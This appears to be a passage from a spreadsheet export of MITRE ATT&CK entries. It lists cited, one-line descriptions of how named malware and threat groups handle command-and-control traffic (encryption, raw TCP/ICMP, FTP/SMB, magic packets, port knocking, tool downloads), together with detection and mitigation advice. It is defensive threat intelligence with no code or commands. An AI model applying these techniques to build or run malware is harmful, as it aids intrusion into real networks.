[ZeroT](https://attack.mitre.org/software/S0230) has used RC4 to encrypt C2 traffic.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)
down_new
[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) uses RC4 and XOR to encrypt C2 traffic.(Citation: Nccgroup Gh0st April 2018)
httpclient
[httpclient](https://attack.mitre.org/software/S0068) encrypts C2 content with XOR using a single byte, 0x12.(Citation: CrowdStrike Putter Panda)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can encrypt the data that it sends and receives from the C2 server using an RC4 encryption algorithm.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
xCaon
[xCaon](https://attack.mitre.org/software/S0653) has encrypted data sent to the C2 server using a XOR key.(Citation: Checkpoint IndigoZebra July 2021) 
</t>
  </si>
  <si>
    <t xml:space="preserve">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Filter Network Traffic
Filter network traffic to prevent use of protocols across the network boundary that are unnecessary.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Network Segmentation
Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used TCP for some C2 communications.(Citation: FireEye APT29 Nov 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom protocol for command and control.(Citation: FoxIT Wocao December 2019)
APT3
An [APT3](https://attack.mitre.org/groups/G0022) downloader establishes SOCKS5 connections for its initial C2.(Citation: FireEye Operation Double Tap)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has used TCP for C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.(Citation: ESET BackdoorDiplomacy Jun 2021)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit Bind and Reverse TCP stagers.(Citation: Trend Micro FIN6 October 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used TCP for C2.(Citation: Microsoft HAFNIUM March 2020)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has used TCP for C2.(Citation: SentinelLabs Metador Sept 2022)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.(Citation: Microsoft PLATINUM June 2017)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has used ICMP in C2 communications.(Citation: Cyberreason Anchor December 2019)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) can use TCP to communicate with command and control servers.(Citation: MalwareBytes SideCopy Dec 2021)
BUBBLEWRAP
[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using SOCKS.(Citation: FireEye admin@338)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has a command built in to use a raw TCP socket.(Citation: CheckPoint Bandook Nov 2020) 
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used raw sockets for network communication.(Citation: Talos Bisonal Mar 2020)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to use TCP for external C2.(Citation: Palo Alto Brute Ratel July 2022)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) uses TCP and UDP for C2.(Citation: ESET Carbon Mar 2017)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to use TCP and UDP for communication.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to use TCP, ICMP, and UDP for C2 communications.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) uses a custom TCP protocol for C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)	 
Cryptoistic
[Cryptoistic](https://attack.mitre.org/software/S0498) can use TCP in communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) binds to a raw socket on a random source port between 31800 and 31900 for C2.(Citation: Fidelis Turbo)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can use TCP to communicate between its agent and client modules.(Citation: NSA/FBI Drovorub August 2020)
FakeM
Some variants of [FakeM](https://attack.mitre.org/software/S0076) use SSL to communicate with C2 servers.(Citation: Scarlet Mimic Jan 2016)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can communicate with C2 over TCP and UDP.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use TCP and UDP in C2 communications.(Citation: ESET Gelsemium June 2021)
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) communicates with a simple network protocol over TCP.(Citation: Intezer HiddenWasp Map 2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has used TCP to download additional modules.(Citation: ESET InvisiMole June 2020)
KEYPLUG
[KEYPLUG](https://attack.mitre.org/software/S1051) can use TCP and KCP (KERN Communications Protocol) over UDP for C2 communication.(Citation: Mandiant APT41)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) uses a custom binary protocol over sockets for C2 communications.(Citation: Proofpoint LookBack Malware Aug 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has used a custom JSON-based protocol for its C&amp;C communications.(Citation: ESET DazzleSpy Jan 2022)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can use raw TCP for C2.(Citation: SentinelLabs Metador Sept 2022)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used raw TCP for C2.(Citation: FireEye Metamorfo Apr 2018) 
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) network traffic communicates over a raw socket.(Citation: Cylance Dust Storm)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) completes network communication via raw sockets.(Citation: Palo Alto MoonWind March 2017)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports WebSocket and TCP-based C2 profiles.(Citation: Mythc Documentation)	
NETEAGLE
If [NETEAGLE](https://attack.mitre.org/software/S0034) does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, [NETEAGLE](https://attack.mitre.org/software/S0034) will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.(Citation: FireEye APT30)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can use TCP in C2 communications.(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) can use TCP in C2 communications.(Citation: Bitdefender Naikon April 2021)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used a custom binary protocol over port 443 for C2 traffic.(Citation: Unit42 OceanLotus 2017)
PHOREAL
[PHOREAL](https://attack.mitre.org/software/S0158) communicates via ICMP for C2.(Citation: FireEye APT32 May 2017)
Pay2Key
[Pay2Key](https://attack.mitre.org/software/S0556) has sent its public key to the C2 server over TCP.(Citation: Check Point Pay2Key November 2020)
Penquin
The [Penquin](https://attack.mitre.org/software/S0587) C2 mechanism is based on TCP and UDP packets.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)
PingPull
 [PingPull](https://attack.mitre.org/software/S1031) variants have the ability to communicate with C2 servers using ICMP or TCP.(Citation: Unit 42 PingPull Jun 2022)
PipeMon
The [PipeMon](https://attack.mitre.org/software/S0501) communication module can use a custom protocol based on TLS over TCP.(Citation: ESET PipeMon May 2020)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can be configured to use raw TCP or UDP for command and control.(Citation: Dell TG-3390)
QUIETEXIT
[QUIETEXIT](https://attack.mitre.org/software/S1084) can establish a TCP connection as part of its initial connection to the C2.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has the ability use TCP to send or receive C2 packets.(Citation: Kaspersky QakBot September 2021)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can use TCP for C2 communication.(Citation: CISA AR18-352A Quasar RAT December 2018)
RARSTONE
[RARSTONE](https://attack.mitre.org/software/S0055) uses SSL to encrypt its communication with its C2 server.(Citation: Aquino RARSTONE)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) has the ability to use TCP and UDP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use TCP in C2 communications.(Citation: Bitdefender Naikon April 2021)
Reaver
Some [Reaver](https://attack.mitre.org/software/S0172) variants use raw TCP for C2.(Citation: Palo Alto Reaver Nov 2017)
Regin
The [Regin](https://attack.mitre.org/software/S0019) malware platform can use ICMP to communicate between infected computers.(Citation: Kaspersky Regin)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) is capable of using ICMP, TCP, and UDP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)
RotaJakiro
[RotaJakiro](https://attack.mitre.org/software/S1078) uses a custom binary protocol using a type, length, value format over TCP.(Citation: netlab360 rotajakiro vs oceanlotus)
Royal
[Royal](https://attack.mitre.org/software/S1073) establishes a TCP socket for C2 communication using the API `WSASocketW`.(Citation: Cybereason Royal December 2022)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)
SUGARUSH
[SUGARUSH](https://attack.mitre.org/software/S1049) has used TCP for C2.(Citation: Mandiant UNC3890 Aug 2022)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) can communicate with actor-controlled C2 servers by using a custom little-endian binary protocol.(Citation: Bitdefender Sardonic Aug 2021)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has used UDP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has the ability to use TCP sockets to send data and ICMP to ping the C2 server.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)
TSCookie
[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) can use TCP for C2 communications.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)
Umbreon
[Umbreon](https://attack.mitre.org/software/S0221) provides access to the system via SSH or any other protocol that uses PAM to authenticate.(Citation: Umbreon Trend Micro)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can communicate through custom methodologies for UDP,  ICMP, and TCP that use distinct sessions to ride over the legitimate protocols.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
WINDSHIELD
[WINDSHIELD](https://attack.mitre.org/software/S0155) C2 traffic can communicate via TCP raw sockets.(Citation: FireEye APT32 May 2017)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can communicate with its C2 server via TCP over port 5200.(Citation: Check Point Warzone Feb 2020)
WellMail
[WellMail](https://attack.mitre.org/software/S0515) can use TCP for C2 communications.(Citation: CISA WellMail July 2020)
Winnti for Linux
[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)
Winnti for Windows
[Winnti for Windows](https://attack.mitre.org/software/S0141) can communicate using custom TCP.(Citation: Novetta Winnti April 2015)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) has used an encrypted protocol within TCP segments to communicate with the C2.(Citation: Gh0stRAT ATT March 2019)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can establish an indirect and raw TCP socket-based connection to the C2 server.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. 
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors had the ability to use FTP for C2.(Citation: McAfee Honeybee)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used SMB for C2.(Citation: US-CERT TA18-074A)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used FTP to download additional malware to the target machine.(Citation: VirusBulletin Kimsuky October 2019)
SilverTerrier
[SilverTerrier](https://attack.mitre.org/groups/G0083) uses FTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)	
Attor
[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can emulate an FTP server to connect to actor-controlled C2 servers.(Citation: BitDefender BADHATCH Mar 2021)
CARROTBALL
[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)
Disco
[Disco](https://attack.mitre.org/software/S1088) can use SMB to transfer files.(Citation: MoustachedBouncer ESET August 2023)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can communicate over FTP.(Citation: Microsoft PLATINUM April 2016)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) uses FTP and FTPS to communicate with the C2 server.(Citation: Unit 42 Kazuar May 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) uses FTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports SMB-based peer-to-peer C2 profiles.(Citation: Mythc Documentation)	
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) has used FTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used FTP for C2 communications.(Citation: Talos PoetRAT October 2020)
Regin
The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)
SYSCON
[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has used FTP for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)
SharpDisco
[SharpDisco](https://attack.mitre.org/software/S1089) has the ability to transfer data between SMB shares.(Citation: MoustachedBouncer ESET August 2023)
XAgentOSX
[XAgentOSX](https://attack.mitre.org/software/S0161) contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.(Citation: XAgentOSX 2017)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has used FTP for C2 connections.(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor recently started applications creating raw socket connections.(Citation: crowdstrike bpf socket filters)
Process Creation
Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)
Filter Network Traffic
Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.
Penquin
[Penquin](https://attack.mitre.org/software/S0587) installs a `TCP` and `UDP` filter on the `eth0` interface.(Citation: Leonardo Turla Penquin May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Network Traffic Content
Monitor and analyze network packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, protocol port mismatch, anomalous syntax, or structure). Consider packet inspection for Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)
Network Traffic Flow
Monitor and analyze network flows associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider analyzing newly constructed network connections that are sent or received by untrusted hosts, unexpcted hardware devices, or other uncommon data flows.
Process Creation
Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)
Disable or Remove Feature or Program
Disable Wake-on-LAN if it is not needed within an environment.
Filter Network Traffic
Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.
Chaos
[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) is triggered by an incoming TCP connection to a legitimate service from a specific source port.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) 
Pandora
[Pandora](https://attack.mitre.org/software/S0664) can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.(Citation: Trend Micro Iron Tiger April 2021)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has used Wake-on-Lan to power on turned off systems for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)
SYNful Knock
[SYNful Knock](https://attack.mitre.org/software/S0519) can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.(Citation: Mandiant - Synful Knock)
Umbreon
[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can intercept the first client to server packet in the 3-way TCP handshake to determine if the packet contains the correct unique value for a specific [Uroburos](https://attack.mitre.org/software/S0022) implant. If the value does not match, the packet and the rest of the TCP session are passed to the legitimate listening application.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Winnti for Linux
[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Network Traffic Flow
Monitor and analyze network flows associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider analyzing newly constructed network connections that are sent or received by untrusted hosts, unexpcted hardware devices, or other uncommon data flows.
Filter Network Traffic
Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.(Citation: Bitdefender StrongPity June 2020)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can use port-knocking to authenticate itself to another implant called Cryshell to establish an indirect connection to the C2 server.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) has authenticated itself to a different implant, Cryshell, through a port knocking and handshake procedure.(Citation: SentinelLabs Metador Sept 2022)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments for suspicious activity associated with downloading external content.
File Creation
Monitor for file creation and files transferred into the network
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
Network Traffic Content
Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs.
Network Traffic Flow
Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP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tools.(Citation: University of Birmingham C2)
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. (Citation: Booz Allen Hamilton)
C0010
During [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors downloaded tools and malware onto a compromised host.(Citation: Mandiant UNC3890 Aug 2022)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors downloaded additional tools and files onto a compromised network.(Citation: DFIR Conti Bazar Nov 2021)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) downloaded malicious payloads onto compromised systems.(Citation: Mandiant APT41)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors downloaded additional tools, such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Sliver](https://attack.mitre.org/software/S0633), as well as [Cobalt Strike](https://attack.mitre.org/software/S0154) and [AvosLocker](https://attack.mitre.org/software/S1053) ransomware onto the victim network.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors downloaded additional tools and files onto victim machines.(Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye APT29 Nov 2018) 
C0026
During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors downloaded malicious payloads onto select compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) downloaded tools using victim organization systems.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors downloaded malware and tools onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors downloaded files and tools onto a victim machine.(Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors downloaded additional droppers and backdoors onto a compromised system.(Citation: Bitdefender FunnyDream Campaign November 2020) 
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used administrative utilities to deliver Trojan components to remote systems.(Citation: McAfee Night Dragon)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) downloaded multistage malware and tools onto a compromised host.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors downloaded additional malware and malicious scripts onto a compromised host.(Citation: McAfee Honeybee)
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), additional payloads were downloaded after a target was infected with a first-stage downloader.(Citation: McAfee Sharpshooter December 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors downloaded additional files to the infected system.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) downloaded additional malware, such as [TEARDROP](https://attack.mitre.org/software/S0560) and [Cobalt Strike](https://attack.mitre.org/software/S0154), onto a compromised host following initial access.(Citation: FireEye SUNBURST Backdoor December 2020)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has downloaded binary data from a specified domain after the malicious document is opened.(Citation: QiAnXin APT-C-36 Feb2019)
APT18
[APT18](https://attack.mitre.org/groups/G0026) can upload a file to the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.(Citation: Bitdefender APT28 Dec 2015)(Citation: Unit 42 Playbook Dec 2017)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has downloaded additional tools and malware onto compromised networks.(Citation: Mandiant No Easy Breach)(Citation: PWC WellMess July 2020)(Citation: F-Secure The Dukes)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can copy files to remote machines.(Citation: FireEye Clandestine Fox)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)	
APT37
[APT37](https://attack.mitre.org/groups/G0067) has downloaded second stage malware from compromised websites.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid BLUELIGHT August 2021)(Citation: Volexity InkySquid RokRAT August 2021)
APT38
[APT38](https://attack.mitre.org/groups/G0082) used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.(Citation: FireEye APT38 Oct 2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has downloaded tools to compromised hosts.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)
Ajax Security Team
[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.(Citation: Check Point Rocket Kitten)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has downloaded additional tools and malware onto compromised hosts.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has downloaded additional malware onto compromised hosts.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has downloaded additional malware and tools onto a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) 
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used various tools to download files, including DGet (a similar tool to wget).(Citation: Secureworks BRONZE BUTLER Oct 2017)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has downloaded additional files and tools onto a compromised host.(Citation: ESET BackdoorDiplomacy Jun 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has remotely copied tools and malware onto targeted systems.(Citation: Cycraft Chimera April 2020)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016) The group's JavaScript backdoor is also capable of downloading files.(Citation: Morphisec Cobalt Gang Oct 2018)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has downloaded additional files and payloads onto a compromised host following initial access.(Citation: Uptycs Confucius APT Jan 2021)(Citation: TrendMicro Confucius APT Aug 2021)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used first-stage payloads that download additional malware from C2 servers.(Citation: Microsoft DUBNIUM June 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has copied and installed tools for operations once in the victim environment.(Citation: US-CERT TA18-074A)
Elderwood
The Ritsol backdoor trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) can download files onto a compromised host from a remote location.(Citation: Symantec Ristol May 2012)
Ember Bear
